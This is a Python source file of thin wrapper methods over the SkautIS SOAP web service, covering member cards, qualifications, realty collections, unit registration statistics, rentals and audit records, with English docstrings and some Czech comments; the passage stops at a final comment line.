def MemberCardUpdateInvalid(self, ID_Login, ID, ID_Person, Birthday, Year, DateCreate, Price, IsAuthorized, IsPaid, ValidFrom, ValidTo, ID_PersonSchool, ID_PersonRegistration, ID_DocumentMediumPhoto, ID_MemberCardState=None, MemberCardState=None, DisplayName=None, Person=None, ID_MemberCardType=None, MemberCardType=None, PersonSchool=None, PersonSchoolCity=None, UnitStredisko=None, LeaderContact=None, StorageMediumPhoto=None):
    """Invalidate a member card.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.MemberCardUpdateInvalid(args)
# Download a qualification certificate.
def QualificationDownload(self, ID_Login, ID):
    """Download the certificate of qualification *ID*."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationDownload(args)
# Create a qualification mistake record.
def QualificationMistakeInsert(self, ID_Login, ID, ID_Qualification, ID_PersonCreated, DateCreated, PersonCreated=None, Description=None):
    """Create a mistake record attached to a qualification."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationMistakeInsert(args)
# Load the list of qualification requests.
def QualificationRequestAll(self, ID_Login, ID_Person, ID, ID_QualificationType, ID_QualificationRequestState=None):
    """List qualification requests matching the given filters."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationRequestAll(args)
# Load the detail of a qualification request.
def QualificationRequestDetail(self, ID_Login, ID):
    """Load the detail of qualification request *ID*."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationRequestDetail(args)
# Download the scanned certificate of a request.
def QualificationRequestDetailDownloadLetter(self, ID_Login, ID):
    """Download the scanned certificate attached to a request."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationRequestDetailDownloadLetter(args)
# Create a qualification request.
def QualificationRequestInsert(self, ID_Login, ID, ID_Person, ID_PersonCreated, ID_QualificationType, ValidFrom, ValidTo, DateCreate, ID_PersonDecision, ID_TempFileScan, ID_Document, Person=None, PersonCreated=None, QualificationType=None, LetterNumber=None, LetterExtension=None, ID_QualificationRequestState=None, QualificationRequestState=None, Course=None, Decision=None, PersonDecision=None):
    """Create a qualification request.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationRequestInsert(args)
# Load the list of qualification request states.
def QualificationRequestStateAll(self, ID_Login, ID=None, DisplayName=None):
    """List the possible states of qualification requests."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationRequestStateAll(args)
# Update a qualification request.
def QualificationRequestUpdate(self, ID_Login, ID, ID_Person, ID_PersonCreated, ID_QualificationType, ValidFrom, ValidTo, DateCreate, ID_PersonDecision, ID_TempFileScan, ID_Document, Person=None, PersonCreated=None, QualificationType=None, LetterNumber=None, LetterExtension=None, ID_QualificationRequestState=None, QualificationRequestState=None, Course=None, Decision=None, PersonDecision=None):
    """Update a qualification request.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationRequestUpdate(args)
# Load the detail of a qualification type.
def QualificationTypeDetail(self, ID_Login, ID):
    """Load the detail of qualification type *ID*."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationTypeDetail(args)
# Send warnings about expiring qualifications and renewal options.
def QualificationUpdateSendWarning(self, ID_Login):
    """Dispatch expiry/renewal warning notifications."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationUpdateSendWarning(args)
# Upload a qualification certificate file.
def QualificationUpload(self, ID_Login, ID, ID_TempFile, LetterExtension=None):
    """Attach an uploaded certificate file to a qualification."""
    args = dict(locals())
    del args["self"]
    return self._client.service.QualificationUpload(args)
# Load realties belonging to a realty collection.
def RealtyAllRealtyCollection(self, ID_Login, ID_RealtyCollection, IsActive):
    """List realties that belong to a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyAllRealtyCollection(args)
# Load administrators of a realty collection.
def RealtyCollectionAdminAll(self, ID_Login, ID_RealtyCollection, ID, ID_Person):
    """List administrators assigned to a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionAdminAll(args)
# Delete a realty collection administrator.
def RealtyCollectionAdminDelete(self, ID_Login, ID):
    """Remove an administrator record from a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionAdminDelete(args)
# Create a realty collection administrator.
def RealtyCollectionAdminInsert(self, ID_Login, ID, ID_RealtyCollection, ID_Person, RealtyCollection=None, Person=None):
    """Assign a person as administrator of a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionAdminInsert(args)
# Delete a realty collection.
def RealtyCollectionDelete(self, ID_Login, ID, Note=None):
    """Delete realty collection *ID*, optionally with a note."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionDelete(args)
# Load the detail of a realty collection.
def RealtyCollectionDetail(self, ID_Login, ID, IsActive):
    """Load the detail of realty collection *ID*."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionDetail(args)
# Load locations of a realty collection.
def RealtyCollectionLocationAll(self, ID_Login, ID_RealtyCollection, ID, ID_RealtyLocation=None):
    """List location records of a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionLocationAll(args)
# Delete the locations of a realty collection.
def RealtyCollectionLocationDeleteRealtyCollection(self, ID_Login, ID_RealtyCollection):
    """Delete all location records of a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionLocationDeleteRealtyCollection(args)
# Create a location for a realty collection.
def RealtyCollectionLocationInsert(self, ID_Login, ID, ID_RealtyCollection, RealtyCollection=None, ID_RealtyLocation=None, RealtyLocation=None):
    """Add a location record to a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionLocationInsert(args)
# Load transport methods of a realty collection.
def RealtyCollectionTransportAll(self, ID_Login, ID_RealtyCollection, ID, ID_RealtyTransport=None):
    """List transport-method records of a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionTransportAll(args)
# Delete the transport methods of a realty collection.
def RealtyCollectionTransportDeleteRealtyCollection(self, ID_Login, ID_RealtyCollection):
    """Delete all transport-method records of a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionTransportDeleteRealtyCollection(args)
# Create a transport method for a realty collection.
def RealtyCollectionTransportInsert(self, ID_Login, ID, ID_RealtyCollection, RealtyCollection=None, ID_RealtyTransport=None, RealtyTransport=None):
    """Add a transport-method record to a realty collection."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionTransportInsert(args)
# Update a realty collection.
def RealtyCollectionUpdate(self, ID_TempFilePhoto, ID_Login, ID, ID_Unit, ID_User, IsActive, GpsLatitude, GpsLongitude, HasAddress, ID_Region, ID_Document, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, Unit=None, UnitRegistrationNumber=None, Owner=None, DisplayName=None, Description=None, Web=None, Street=None, City=None, Postcode=None, District=None, TransportationMethods=None, TransportationMethodsText=None, TransportDescription=None, Locations=None, LocationsText=None, PointsOfInterest=None, Note=None, Region=None, Storage=None):
    """Update a realty collection.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyCollectionUpdate(args)
# Delete a realty.
def RealtyDelete(self, ID_Login, ID, Note=None):
    """Delete realty *ID*, optionally with a note."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyDelete(args)
# Load documents by occupation.
def RealtyDocumentAllOccupation(self, ID_Login, ID, ID_User, ID_Occupation, Location=None):
    """List realty documents filtered by occupation."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyDocumentAllOccupation(args)
# Load documents by realty.
def RealtyDocumentAllRealty(self, ID_Login, ID_Realty, ID, ID_User, Location=None):
    """List documents attached to a realty."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyDocumentAllRealty(args)
# Create a document.
def RealtyDocumentInsert(self, ID_Login, ID, ID_User, Saved, IsPublic, Size, ID_Realty, ID_Occupation, ID_TempFileDocument, ID_Document, DisplayName=None, Location=None, Origin=None, DownloadName=None, Note=None, Hash=None, Realty=None, Extension=None):
    """Create a realty document record.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyDocumentInsert(args)
# Update a document's bindings to other tables.
def RealtyDocumentUpdateBinding(self, ID_Login, ID, ID_User, Saved, IsPublic, Size, ID_Realty, ID_Occupation, ID_TempFileDocument, ID_Document, DisplayName=None, Location=None, Origin=None, DownloadName=None, Note=None, Hash=None, Realty=None, Extension=None):
    """Update the relations of a realty document to other tables.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyDocumentUpdateBinding(args)
# Add a realty to a realty collection.
def RealtyInsertRealtyCollection(self, ID_Login, ID_RealtyCollection, IsPower, ID_TempFilePhoto, LVNumber, Acreage, GpsLatitude, GpsLongitude, RealtyGpsLatitude, RealtyGpsLongitude, DisplayName=None, ID_OwnerType=None, OwnerTypeNote=None, Description=None, Note=None, ID_RegisterType=None, RegisterCode=None, FotogalleryUrl=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None):
    """Create a realty inside a realty collection.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyInsertRealtyCollection(args)
# Load the list of locations.
def RealtyLocationAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
    """List realty location codes."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyLocationAll(args)
# Load the list of transport types.
def RealtyTransportAll(self, ID_Login, ID=None, DisplayName=None):
    """List realty transport types."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyTransportAll(args)
# Load the detail of a realty type.
def RealtyTypeDetail(self, ID_Login, ID):
    """Load the detail of realty type *ID*."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyTypeDetail(args)
# Set a realty's assignment to the Scout Energy programme.
def RealtyUpdateIsPower(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
    """Toggle a realty's Scout Energy assignment.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyUpdateIsPower(args)
# Remove a realty from its collection.
def RealtyUpdateRemoveFromCollection(self, ID_Login, ID, ID_RealtyType, GpsLatitude, GpsLongitude, ID_RealtyCollection, IsPower, ValidTo, IsActive, ID_TempFilePhoto, IsAddressAuthenticated, ID_Document, LVNumber, Acreage, RealtyGpsLatitude, RealtyGpsLongitude, CoordinateX, CoordinateY, DisplayName=None, RealtyType=None, Street=None, City=None, Postcode=None, Description=None, Note=None, RealtyCollection=None, ID_OwnerType=None, OwnerType=None, OwnerTypeNote=None, PhotoExtension=None, PhotoFileContent=None, FotogalleryUrl=None, District=None, Storage=None, ParcelNumber=None, RegisterCity=None, CadastralArea=None, ParcelType=None, LandType=None, Unit=None, UnitRegistrationNumber=None):
    """Detach a realty from its realty collection.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RealtyUpdateRemoveFromCollection(args)
# Load the list of cadastre register record types.
def RegisterTypeAll(self, ID_Login, ID=None, DisplayName=None):
    """List cadastre register record types."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RegisterTypeAll(args)
# Update the comment of a person's registration defect.
def PersonMistakeReportUpdatePerson(self, ID_Login, ID, ID_Person, ID_Unit, ID_UnitRegistration, ID_Mistake, Person=None, UnitRegistrationNumber=None, Unit=None, Mistake=None, DisplayName=None, ParentComment=None):
    """Update the comment attached to a person's registration defect."""
    args = dict(locals())
    del args["self"]
    return self._client.service.PersonMistakeReportUpdatePerson(args)
# Update the comment of a unit's registration defect.
def UnitMistakeReportUpdateUnit(self, ID_Login, ID, ID_Unit, ID_Mistake, Unit=None, RegistrationNumber=None, Mistake=None, DisplayName=None, ParentComment=None):
    """Update the comment attached to a unit's registration defect."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitMistakeReportUpdateUnit(args)
# Load age statistics of subordinate units' registrations (datatable).
def UnitRegistrationAllSubStatsAgeTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration age statistics of subordinate units as a datatable."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllSubStatsAgeTable(args)
# Load unit-type statistics of subordinate units' registrations (datatable).
def UnitRegistrationAllSubStatsTypeTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration unit-type statistics of subordinate units as a datatable."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllSubStatsTypeTable(args)
# Load troop-type statistics of subordinate troops' registrations (datatable).
def UnitRegistrationAllSubStatsTroopTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration troop-type statistics of subordinate troops as a datatable."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllSubStatsTroopTable(args)
# Load troop-type statistics of subordinate troops' registrations.
def UnitRegistrationAllSubStatsTroop(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration troop-type statistics of subordinate troops."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllSubStatsTroop(args)
# Load unit-type statistics of subordinate units' registrations.
def UnitRegistrationAllSubStatsType(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration unit-type statistics of subordinate units."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllSubStatsType(args)
# Load age statistics of subordinate units' registrations.
def UnitRegistrationAllSubStatsAge(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration age statistics of subordinate units."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllSubStatsAge(args)
# Load age statistics of the given unit's registrations (datatable).
def UnitRegistrationAllStatsAgeTable(self, ID_Login, ID_Unit, IsExpanded, LastNYears):
    """Registration age statistics of the given unit as a datatable."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllStatsAgeTable(args)
# Load age statistics of the given unit's registrations.
def UnitRegistrationAllStatsAge(self, ID_Login, ID_Unit, IsExpanded, LastNYears, PrepareInvertedDatatable):
    """Registration age statistics of the given unit."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllStatsAge(args)
# Load category statistics of the given unit's registrations (datatable).
def UnitRegistrationAllStatsCategoryTable(self, ID_Login, ID_Unit, LastNYears, IsExpanded):
    """Registration category statistics of the given unit as a datatable."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllStatsCategoryTable(args)
# Load category statistics of the given unit's registrations.
def UnitRegistrationAllStatsCategory(self, ID_Login, ID_Unit, LastNYears, IsExpanded):
    """Registration category statistics of the given unit."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllStatsCategory(args)
# Load registration statistics of a unit.
def UnitRegistrationAllStats(self, ID_Login, ID_Unit):
    """Load overall registration statistics of a unit."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllStats(args)
# Update registration instructions.
def UnitRegistrationUpdateInstructions(self, ID_Login, ID, ID_Unit, Year, DateChecked, DateConfirmed, IsDelivered, IsAccepted, ID_UnitRegistrationParent, ParentIsDelivered, ParentIsAccepted, ParentHasCreated, Unit=None, RegistrationNumber=None, DisplayName=None, ID_UnitType=None, Instructions=None, UnitRegistrationParent=None, InstructionsParent=None):
    """Update the instructions attached to a unit registration.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationUpdateInstructions(args)
# Recalculate member and unit statistics in a registration.
def UnitRegistrationRebuildMembers(self, ID_Login, ID, Year):
    """Recalculate member/unit statistics for a registration year."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationRebuildMembers(args)
# Overview of registration comments of subordinate units.
def UnitRegistrationReportChild(self, ID_Login, ID, ShowChildUnit, UnitType=None, RegistrationNumber=None):
    """Report registration comments of subordinate units."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationReportChild(args)
# Load the list of registration years (headquarters).
def UnitRegistrationAllYearUstredi(self, ID_Login, ExportFilter):
    """List registration years at headquarters level."""
    args = dict(locals())
    del args["self"]
    return self._client.service.UnitRegistrationAllYearUstredi(args)
# Load the detail of a request for a cover letter.
def RegistryDetailExport(self, ID_Login, ID):
    """Load a registry request detail for cover-letter export."""
    args = dict(locals())
    del args["self"]
    return self._client.service.RegistryDetailExport(args)
# Update the note of an organisational-unit registry record.
def RegistryUpdateNote(self, ID_Login, ID, Sequence, ID_Unit, IsPropertyOwner, IsPropertyOwnerOld, OldHistoryObjectId, NewHistoryObjectId, ID_PersonCreate, DateCreate, ID_PersonUpdate, DateUpdate, ID_PersonSent, DateSent, ID_PersonClosed, DateClosed, ID_PersonCancel, DateCancel, ID_Function, ID_FunctionType, NewAccount, ID_PersonFunction, ID_PersonFunctionOld, ID_PersonSolving, DateSolving, ID_Document, ID_Statement, StatementYear, ID_DocumentStatement, ID_DocumentDecision, ID_DocumentPropertyAgreement, DisplayName=None, Unit=None, RegistrationNumber=None, IC=None, Street=None, City=None, Postcode=None, PropertyAgreementExtension=None, UnitOld=None, StreetOld=None, CityOld=None, PostcodeOld=None, ID_RegistryObject=None, RegistryObject=None, ID_RegistryType=None, RegistryType=None, ID_RegistryState=None, RegistryState=None, PersonCreate=None, PersonUpdate=None, PersonSent=None, PersonClosed=None, PersonCancel=None, CancelDecision=None, FunctionType=None, PersonFunction=None, PersonFunctionOld=None, Account=None, Note=None, PersonSolving=None, DecisionSeatChangeExtension=None):
    """Update the note on an organisational-unit registry record.

    The SOAP payload mirrors the parameter list 1:1, so it is built
    directly from the call arguments.
    """
    args = dict(locals())
    del args["self"]
    return self._client.service.RegistryUpdateNote(args)
# Načíst seznam typů razítka
def StampTypeAll(self, ID_Login, ID=None, DisplayName=None):
    """Load the list of stamp types (SkautIS ``StampTypeAll`` endpoint)."""
    # All arguments except ``self`` form the request payload, keyed by name.
    request = dict(locals())
    request.pop("self")
    return self._client.service.StampTypeAll(request)
# Načíst detail hospodářského výkazu pro sestavu
def StatementDetailReport(self, ID_Login, ID):
    """Load the detail of an economic statement for a report."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.StatementDetailReport(request)
# Načíst seznam stavů hospodářského výkazu
def StatementStateAll(self, ID_Login, ID=None, DisplayName=None):
    """Load the list of economic statement states."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.StatementStateAll(request)
# Upravit stav hospodářského výkazu
def StatementUpdateState(self, ID_Login, ID, ID_Unit, Year, IsError, IsDelivered, DateDelivered, DateCreated, IsThousands, IsConsultant, ID_Document, ID_DocumentTempFile, DateSent, ID_PersonSent, DateConfirmed, ID_PersonConfirmed, ID_Registry, ShowOverview, Unit=None, RegistrationNumber=None, ID_StatementType=None, StatementType=None, ID_StatementState=None, StatementState=None, PersonSent=None, PersonConfirmed=None):
    """Update the state of an economic statement."""
    # The payload keys mirror the parameter names one-to-one, so collect
    # them from locals() instead of repeating the whole list by hand.
    request = dict(locals())
    request.pop("self")
    return self._client.service.StatementUpdateState(request)
# Načíst seznam jednotek pro Google synchronizaci
def UnitAllGoogleGroupSync(self, ID_Login, ID_GoogleGroup):
    """Load the list of units for Google synchronization."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.UnitAllGoogleGroupSync(request)
# Načíst seznam jednotek v STS
def UnitAllTelephony(self, ID_Login, ID_Application, ID, ID_Group, RegistrationNumberStartWith, ID_UnitType=None, RegistrationNumber=None, DisplayName=None, Location=None, AccountNumber=None, IC=None):
    """Load the list of units in STS (telephony)."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.UnitAllTelephony(request)
# Načíst seznam jednotek pro menu
def UnitAllMenu(self, ID_Login, ID_Application, ID, ID_UnitParent, ID_UnitChild):
    """Load the list of units for the menu."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.UnitAllMenu(request)
# Načíst seznam evidencí provedených kontrol
def UnitAuditRegisterAllUnit(self, ID_Login, ID_Unit):
    """Load the list of performed-audit registers of a unit."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.UnitAuditRegisterAllUnit(request)
# Načíst detail zobrazení osoby v adresáři
def CatalogDisplayDetail(self, ID_Login, ID_Person):
    """Load the detail of a person's display in the directory."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.CatalogDisplayDetail(request)
# Upravit zobrazení osoby v adresáři
def CatalogDisplayUpdate(self, ID_Login, ID, ID_Person, Birthday, YearFrom, Adress, PostalAdress, School, Function, Qualification, EducationSeminary, Offer, Education, Membership, Person=None):
    """Update a person's display in the directory."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.CatalogDisplayUpdate(request)
# Načíst detail limitu pro vyhledávání osob v adresáři
def CatalogLimitDetail(self, ID_Login, ID_Person):
    """Load the detail of the person-search limit in the directory."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.CatalogLimitDetail(request)
# Upravit limit pro vyhledávání osob v adresáři
def CatalogLimitUpdate(self, ID_Login, ID_Person, OnlyWeek):
    """Update the person-search limit in the directory."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.CatalogLimitUpdate(request)
# Načíst seznam fakturačních jednotek
def InvoiceGroupAll(self, ID_Login, ID, ID_TelephonyUnit, DisplayName=None):
    """Load the list of invoice groups."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.InvoiceGroupAll(request)
# Načíst výchozí fakturační jednotku
def InvoiceGroupDetailDefault(self, ID_Login):
    """Load the default invoice group."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.InvoiceGroupDetailDefault(request)
# Načíst seznam dokumentů užití nemovitosti
def OccupationPhotoAll(self, ID_Login, ID_Occupation, ID, ID_Document):
    """Load the list of realty-usage documents."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationPhotoAll(request)
# Smazat dokument užití nemovitosti
def OccupationPhotoDelete(self, ID_Login, ID):
    """Delete a realty-usage document."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationPhotoDelete(request)
# Založit dokument užití nemovitosti
def OccupationPhotoInsert(self, ID_Login, ID, ID_Occupation, ID_Document, ID_TempFile, Description=None):
    """Create a realty-usage document."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationPhotoInsert(request)
# Načíst detail půjčitelné nemovitosti pro kalendář
def OccupationRentDetailCalendar(self, ID_Login, ID_Application, ID):
    """Load the detail of a rentable realty for the calendar."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentDetailCalendar(request)
# Načíst seznam půjčitelných nemovitostí pro kalendář
def OccupationRentAllCalendarAll(self, ID_Login, ID_Application, IsInstant):
    """Load the list of rentable realties for the calendar."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentAllCalendarAll(request)
# Načíst seznam půjčitelných jednotek pro API
def OccupationRentAllPublicApi(self, ID_Login, ID_Application):
    """Load the list of rentable units for the public API."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentAllPublicApi(request)
# Načíst seznam půjčitelných jednotek s detailnímí informacemi pro API
def OccupationRentAllPublicApiDetail(self, ID_Login, ID_Application, ID_RealtyType, Capacity, ID_Items=None, ID_OccupationEquipment=None, ID_RealtyLocations=None):
    """Load the list of rentable units with detailed information for the public API."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentAllPublicApiDetail(request)
# Načíst detail půjčitelné jednotky pro API
def OccupationRentDetailPublicApi(self, ID_Login, ID_Application, ID):
    """Load the detail of a rentable unit for the public API."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentDetailPublicApi(request)
# Načíst seznam cen za pronájem
def OccupationRentPriceAllOccupationRent(self, ID_Login, ID_Application, ID_OccupationRent):
    """Load the list of rental prices."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentPriceAllOccupationRent(request)
# Změnit data kalendářů půjčitelné jednotky
def OccupationRentUpdateCalendarFile(self, ID_Login, ID_Application, ID, ID_TempFile, ID_TempFileAdmin):
    """Change the calendar data of a rentable unit."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentUpdateCalendarFile(request)
# Nastavit datum generování kalendáře
def OccupationRentUpdateRegenerateCalendar(self, ID_Login, ID_Application, ID, Reset):
    """Set the calendar generation date."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.OccupationRentUpdateRegenerateCalendar(request)
# Načíst seznam osob týmu vzdělávací akce
def PersonAllEventEducationTeam(self, ID_Login, ID_EventEducation, DisplayName=None):
    """Load the list of persons on an educational event's team."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.PersonAllEventEducationTeam(request)
# Založit změnu u osoby zákonným zástupcem
def PersonChangeInsertPersonParent(self, ID_Login, ID_Person):
    """Create a change on a person submitted by their legal guardian."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.PersonChangeInsertPersonParent(request)
# Načtení informací o dětech osoby
def PersonDetailChildren(self, ID_Login, ID):
    """Load information about a person's children."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.PersonDetailChildren(request)
# Načíst seznam potomků osoby
def PersonParentAllPersonChildren(self, ID_Login, ID_Application, ID_Person, ID, ID_PersonParent, ID_ParentType=None):
    """Load the list of a person's descendants."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.PersonParentAllPersonChildren(request)
# Načíst seznam náborových kategorií
def AdvertisingCategoryAllOccupation(self, ID_Login, ID_Application, ID_Occupation, ID_MeetingDate, ID_Sex=None):
    """Load the list of recruitment categories."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.AdvertisingCategoryAllOccupation(request)
# Načíst seznam položek kontroly
def AuditRegisterItemAll(self, ID_Login, ID_UnitAuditRegister, ID, ID_Person, ID_AuditRegisterItemType=None):
    """Load the list of audit items."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.AuditRegisterItemAll(request)
# Smazat položku kontroly
def AuditRegisterItemDelete(self, ID_Login, ID, ID_UnitAuditRegister, Done, ID_Person, IsDone, ID_AuditRegisterItemType=None, AuditRegisterItemType=None, AuditRegisterItemTypeHelp=None, AuditRegisterItemTypeCustom=None, Person=None, Comment=None, HelpCustom=None, DoneText=None):
    """Delete an audit item."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.AuditRegisterItemDelete(request)
# Založit položku kontroly
def AuditRegisterItemInsert(self, ID_Login, ID, ID_UnitAuditRegister, Done, ID_Person, IsDone, ID_AuditRegisterItemType=None, AuditRegisterItemType=None, AuditRegisterItemTypeHelp=None, AuditRegisterItemTypeCustom=None, Person=None, Comment=None, HelpCustom=None, DoneText=None):
    """Create an audit item."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.AuditRegisterItemInsert(request)
# Upravit položku kontroly
def AuditRegisterItemUpdate(self, ID_Login, ID, ID_UnitAuditRegister, Done, ID_Person, IsDone, ID_AuditRegisterItemType=None, AuditRegisterItemType=None, AuditRegisterItemTypeHelp=None, AuditRegisterItemTypeCustom=None, Person=None, Comment=None, HelpCustom=None, DoneText=None):
    """Update an audit item."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.AuditRegisterItemUpdate(request)
# Načíst seznam státních občanství
def CitizenshipAll(self, ID_Login, ID_Application, ID=None, DisplayName=None):
    """Load the list of citizenships."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.CitizenshipAll(request)
# Načíst seznam typů změny kontaktu
def ContactRequestTypeAll(self, ID_Login, ID=None, DisplayName=None):
    """Load the list of contact-change request types."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.ContactRequestTypeAll(request)
# Založit semináře účastníkům vzdělávací akce
def EducatationSeminaryInsertEventEducation(self, ID_Login, ID_EventEducation):
    """Create seminars for participants of an educational event.

    NOTE(review): the endpoint name misspells "Educatation" — it is kept
    as-is because it must match the remote SOAP operation.
    """
    request = dict(locals())
    request.pop("self")
    return self._client.service.EducatationSeminaryInsertEventEducation(request)
# Načíst detail souhlasu se zápisem do spolkového rejstříku
def FunctionDetailAgreementDownload(self, ID_Login, ID):
    """Load the detail of the consent to entry in the association register."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.FunctionDetailAgreementDownload(request)
# Načtení informací o osobě pro souhlas se zápisem do spolkového rejstříku
def FunctionDetailAgreementTemplate(self, ID_Login, ID, ID_FunctionType, CityText=None):
    """Load person information for the consent to entry in the association register."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.FunctionDetailAgreementTemplate(request)
# Načíst seznam typů funkcí pro Google synchronizaci
def FunctionTypeAllGoogleGroupSync(self, ID_Login, ID_GoogleGroup, IsDirect):
    """Load the list of function types for Google synchronization."""
    request = dict(locals())
    request.pop("self")
    return self._client.service.FunctionTypeAllGoogleGroupSync(request)
# Potvrzení souhlasu se zápisem do spolkového rejstříku
